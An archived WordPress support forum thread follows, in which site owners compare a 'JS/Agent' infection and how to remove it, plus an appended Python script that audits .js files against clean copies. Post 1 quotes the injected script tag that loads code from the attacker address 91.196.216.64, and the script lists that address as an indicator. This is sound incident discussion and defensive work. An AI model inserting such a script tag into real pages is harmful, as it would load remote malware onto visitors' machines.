
"JS/Agent" warnings in AVG - nightmare hack in multiple WordPress sites (5 posts)

  1. boeellis
    Member
    Posted 3 years ago #

    Friends,

    I have multiple sites prompting the AVG warning "JS/Agent". This is most prominent in IE, less prominent in Chrome and non-existent in Safari and Firefox.

    Nonetheless, the hack is there. Somewhere. I have been reading posts and threads and begging Dreamhost to help me for three straight days, nonstop...

    And yes, I am somewhat of a novice when it comes to php scripts, jquery scripts, and all that code (that's why I use WordPress!)... But I have made some progress... I have changed all ftp passwords, all user passwords and the "keys" in all of the wp-config files... I have upgraded all sites to 3.3.1 and updated or deleted most plugins, etc... All the recommended stuff... And while that might help things moving forward, the damage is already done... to at least six of my sites... probably more.

    It started six days ago when AVG Free began pegging one of our sites with the "JS/Agent" virus warning... It gave us a bunch of file names in the Temporary Internet Folders with IE and in the Cache folders with Chrome... I downloaded the theme folder from one of the sites and AVG started pegging all of the .js files as infected...

    So, I began scouring all of my main *.php files for anything unusual and could not find anything. Then, I used Firebug on my home page and found a common denominator... All the sites have a script loading in the header section... in most cases right between two jquery lines.... I will attempt to place that code into this post with backticks now:

    The line above:
    `<script type="text/javascript" src="http://allpropastors.org/wp-includes/js/jquery/jquery.js?ver=1.7.1"/>`

    The hack line:
    `<script id="dgllhguk" src="http://91.196.216.64/s.php?ref=&lc=http://allpropastors.org/&ua=Mozilla/5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit/535.7%20%28KHTML%2C%20like%20Gecko%29%20Chrome/16.0.912.75%20Safari/535.7"/>`

    The line below:
    `<script type="text/javascript" src="http://allpropastors.org/wp-content/themes/iCompany/lib/featured-images/js/jquery.cross-slide.js?ver=3.3.1"/>`

    Now - I understand that I need to locate and remove that code, but I don't know how... In one instance, I found that hack between two lines that applied to a plugin and I was able to delete the plugin and therefore the code (though even after that the site still triggered an AVG warning in I.E. on the swfobect[2].js file... I have since recreated that site completely - which took 10 hours.... So you can see why I am hopeful that someone reading this post will help me, please... )

    Thanks so much... From Wake Forest, NC to your home or office. God bless.

    Sincerely,

    Boe

  2. lookhappy
    Member
    Posted 3 years ago #

    I've been having the same issue, and I recently implemented multiple additional security measures to try and stop things like this happening.

    I managed to track it down though - I believe it was being caused by Akismet. So I deleted and reinstalled that plugin and it seems better. Still looking for how this happened though. I'm afraid I'm not a code expert either.

  3. thellwig
    Member
    Posted 3 years ago #

    I wonder if this is coincidental or not, but I'm in Rolesville, NC, yes, right next to Wake Forest, and I just had the same script show up in my WordPress site too.
    It's in the <head></head> tag surrounded on either side by other legitimate scripts.

    If anyone finds out where the problem is and how to fix it, I'll be much obliged!

    Timothy

  4. thellwig
    Member
    Posted 3 years ago #

    Ok, I actually solved it pretty quickly, but I still have no idea how my file got infected.

    For anyone else having this problem, here's how to fix it. Notice how the link to 91.196.216.64/s.php is located between two other scripts? Open up the script that is referenced right before this one.
    For example, in Boe's situation, you would open up the jQuery script file. (In my case it was in the Tipsy script file.) Go all the way to the bottom of that file, and you'll see a line of code that looks like this: http://pastebin.com/XxxbPFUy (yes, it's a really long line. That was the code I found in mine).
    DELETE THAT LINE!

    Once you've done that, reload your site and the link in the header will be gone.

    So that's how to remove it, but I don't know how to keep it from coming back. Any insight into what caused this would be helpful.

  5. Bas
    Member
    Posted 3 years ago #

    I have exactly the same problem, I've just been hacked for the fourth time and I can't find out the cause of this. Maybe it's a good idea to post our plugins and theme here so we can compare them?

    My plugins:

    - Akismet
    - BackWPup
    - Google Analytics for WordPress
    - Google XML Sitemaps
    - Hello Dolly
    - SEO friendly images
    - TimThumb Vulnerability Scanner
    - Wordbooker
    - WordPress SEO
    - WP-SimpleViewer
    - WP Maintenance Mode

    My theme:

    Village from Theme Province

    I really hope we can solve this together, because it's driving me crazy :p
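
Added example, not part of any post in this thread: thellwig's fix in post 4 (the extra line sits at the bottom of an otherwise intact .js file) can be checked across a whole site by comparing every .js file against a clean copy of the same WordPress, theme and plugin versions. The directory layout, the function names `audit_js` and `demo`, and the sample file contents are assumptions constructed for illustration; only the address 91.196.216.64 and the jQuery/Tipsy file names come from the thread.

```python
import hashlib
import tempfile
from pathlib import Path

# Host of the injected <script> as reported in the thread; extend as needed.
INDICATORS = [b"91.196.216.64"]

def audit_js(site_root, clean_root):
    """Compare each .js under site_root with the same path under clean_root."""
    findings = []
    for live in sorted(Path(site_root).rglob("*.js")):
        rel = live.relative_to(site_root)
        ref = Path(clean_root) / rel
        data = live.read_bytes()
        entry = {"file": rel.as_posix(), "appended_bytes": 0,
                 "indicator": any(i in data for i in INDICATORS)}
        if not ref.is_file():
            entry["status"] = "no-reference"   # nothing to compare against
        else:
            good = ref.read_bytes()
            if hashlib.sha256(data).digest() == hashlib.sha256(good).digest():
                continue                        # byte-identical to clean copy
            base = good.rstrip()
            tail = data[len(base):].strip() if data.startswith(base) else None
            if tail == b"":
                continue                        # only trailing whitespace differs
            # Clean file intact with extra bytes after it: the pattern in the thread.
            entry["status"] = "appended" if tail else "modified"
            entry["appended_bytes"] = len(tail or b"")
        findings.append(entry)
    return findings

def demo():
    """Build a constructed site/clean pair in a temp dir and audit it."""
    clean_js = b"/* constructed stand-in for jquery.js */\n(function(){})();\n"
    # Placeholder for the long injected line, not the real payload.
    injected = b"/* constructed placeholder referencing 91.196.216.64 */\n"
    with tempfile.TemporaryDirectory() as tmp:
        site, clean = Path(tmp, "site"), Path(tmp, "clean")
        for root in (site, clean):
            (root / "js").mkdir(parents=True)
            (root / "js/jquery.js").write_bytes(clean_js)
            (root / "js/tipsy.js").write_bytes(clean_js)
        (site / "js/jquery.js").write_bytes(clean_js + injected)
        (site / "js/extra.js").write_bytes(b"var x = 1;\n")
        return audit_js(site, clean)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Comparing against a clean copy avoids false alarms on minified libraries, which are legitimately one very long line; files reported as `no-reference` have no clean counterpart and need a manual look.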

Topic Closed

This topic has been closed to new replies.
